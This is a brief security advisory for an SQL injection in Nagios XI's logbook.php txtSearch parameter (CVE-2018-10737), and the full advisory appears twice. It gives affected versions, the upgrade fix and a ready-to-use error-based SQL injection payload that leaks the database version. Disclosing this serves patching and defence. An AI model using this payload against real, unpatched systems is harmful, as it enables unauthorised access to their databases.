### NagiosXI <= 5.4.12 logbook.php SQL injection(CVE-2018-10737) #### Description A SQL injection issue was discovered in Nagios XI via the admin/logbook.php txtSearch parameter. #### Affected Version * Nagios XI 5.2.x * Nagios XI 5.4.x before 5.4.13 #### Proof of concept ``` http://xxxx/nagiosql/admin/logbook.php postdata: txtSearch=-1%' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# ```  #### Fix Upgrade to version 5.4.13
### NagiosXI <= 5.4.12 logbook.php SQL injection(CVE-2018-10737) #### Description A SQL injection issue was discovered in Nagios XI via the admin/logbook.php txtSearch parameter. #### Affected Version * Nagios XI 5.2.x * Nagios XI 5.4.x before 5.4.13 #### Proof of concept ``` http://xxxx/nagiosql/admin/logbook.php postdata: txtSearch=-1%' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# ```  #### Fix Upgrade to version 5.4.13